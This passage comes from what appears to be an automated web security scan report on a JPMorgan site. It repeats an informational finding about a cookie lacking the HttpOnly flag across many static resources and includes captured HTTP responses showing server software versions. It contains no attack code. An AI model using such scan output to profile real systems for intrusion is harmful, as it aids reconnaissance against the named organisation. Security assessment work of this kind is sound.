ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.138. https://mm.jpmorgan.com/css/yui/tabview.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/tabview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.139. https://mm.jpmorgan.com/css/yui/treeview.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/treeview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"5077-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 5077
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
table.ygtvtable{margin-bottom:0;border:
...[SNIP]...

11.140. https://mm.jpmorgan.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.141. https://mm.jpmorgan.com/images/JPM_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/JPM_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.142. https://mm.jpmorgan.com/images/Morgan_Markets_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/Morgan_Markets_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"2594-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 2594
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..........rsvwx{qrupqtops.........xy|..................nor..........................................z{~...stwuvx........................vwz...|}...............................................
...[SNIP]...

11.143. https://mm.jpmorgan.com/images/backgrounds/btn_hover_center_bg.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/backgrounds/btn_hover_center_bg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:26 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"177-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=3600
Expires: Tue, 12 Jul 2011 17:30:26 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 177
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/png

.PNG
.
...IHDR..............}2.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<.../IDAT.Wc..-....D.;...n.e......2w.+...N.J0.........%#e......IEND.B`.

11.144. https://mm.jpmorgan.com/images/btn_center_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/btn_center_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"138-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 138
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................................................................,........... d...<H.D. (...;

11.145. https://mm.jpmorgan.com/images/btn_hover_center_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/btn_hover_center_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.146. https://mm.jpmorgan.com/images/btn_hover_left_side.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/btn_hover_left_side.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:25 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"170-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:25 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 170
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........q..[..J..?.....L..v..b..W..N.....{.....p........}..G.. ..U..X..j..+.q......G.f................!.......,..........'.vi..i
.9.F..2iF.5.VZ.h..P.....ERB.4!.;

11.147. https://mm.jpmorgan.com/images/btn_hover_right_side.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/btn_hover_right_side.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:26 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"170-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:26 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 170
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........q..[..J..?.....L..v..b..W..N.....{.....p........}..G.. ..U..X..j..+.q......G.f................!.......,..........'.vm.u..v8Z@h..%..5.PiL.a._.(,>.. E.0.6!.;

11.148. https://mm.jpmorgan.com/images/btn_left_side.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/btn_left_side.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"175-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 175
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................................................................!.......,..........,..i.T!..U.FY.1h..I..$Z.h..P......Bc1h
..E. ..;

11.149. https://mm.jpmorgan.com/images/btn_right_side.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/btn_right_side.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"174-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 174
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................................................................!.......,..........+..m..Q."U.Ei..A..HZ.hN.]._....|
..`.<
-.h...;

11.150. https://mm.jpmorgan.com/images/icons/attention.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/icons/attention.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.151. https://mm.jpmorgan.com/images/menu_bg_img.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/menu_bg_img.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"4057-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 4057
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................@....
...[SNIP]...

11.152. https://mm.jpmorgan.com/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.153. https://mm.jpmorgan.com/js/dropdowns.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/dropdowns.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.154. https://mm.jpmorgan.com/js/feedback.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/feedback.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.155. https://mm.jpmorgan.com/js/gecFunctions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/gecFunctions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"1705-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 1705
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

var submitGecForm = function() {
if (document.getElementById('gecForm').action != 'MorganMarkets?page=global_equity_coverage') {
document.getElementById('gecForm').action = 'MorganMarkets?page=gl
...[SNIP]...

11.156. https://mm.jpmorgan.com/js/menu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/menu.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.157. https://mm.jpmorgan.com/js/personalisation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/personalisation.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"15959-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 15959
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

//Function to get a new XML Http Request object
function AJAXRequest() {
   if (window.XMLHttpRequest) {
       return new XMLHttpRequest();
   }
   else if (window.ActiveXObject) {
       return new ActiveXObj
...[SNIP]...

11.158. https://mm.jpmorgan.com/js/portalBondIndex.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/portalBondIndex.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"8066-1310119358000"
Last-Modified: Fri, 08 Jul 2011 10:02:38 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 8066
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

function makeUrl(url) {
//prefixUrl = "http://morganmarkets.jpmorgan.com";
prefixUrl = "";
fullUrl = prefixUrl + url;
return fullUrl;
}

function docLoc(relUrl) {
//prefix = 'http://mo
...[SNIP]...

11.159. https://mm.jpmorgan.com/js/portlet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/portlet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:51 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"7376-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:51 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 7376
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

function refreshAllCheckBoxDivs(portletId,checkBoxSize,displayMaxRows)
{
// var displayMaxRows = 10;
   var portletDiv = document.getElementById(portletId);
   var visibleDivs = 0;
   var chec
...[SNIP]...

11.160. https://mm.jpmorgan.com/js/yui/button-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/button-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"27973-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 27973
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var G=YAHOO.util.Dom,M=YAHOO.util
...[SNIP]...

11.161. https://mm.jpmorgan.com/js/yui/connection-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/connection-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"13048-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 13048
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
YAHOO.util.Connect={_msxml_progid:["Microsoft
...[SNIP]...

11.162. https://mm.jpmorgan.com/js/yui/container-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/container-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"74941-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:55 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 74941
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){YAHOO.util.Config=function(D){if(
...[SNIP]...

11.163. https://mm.jpmorgan.com/js/yui/element-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/element-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"9242-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 9242
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
YAHOO.util.Attribute=function(B,A){if(A){thi
...[SNIP]...

11.164. https://mm.jpmorgan.com/js/yui/event-delegate-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/event-delegate-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"1506-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 1506
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var A=YAHOO.util.Event,C=YA
...[SNIP]...

11.165. https://mm.jpmorgan.com/js/yui/selector-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/selector-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"7809-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 7809
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
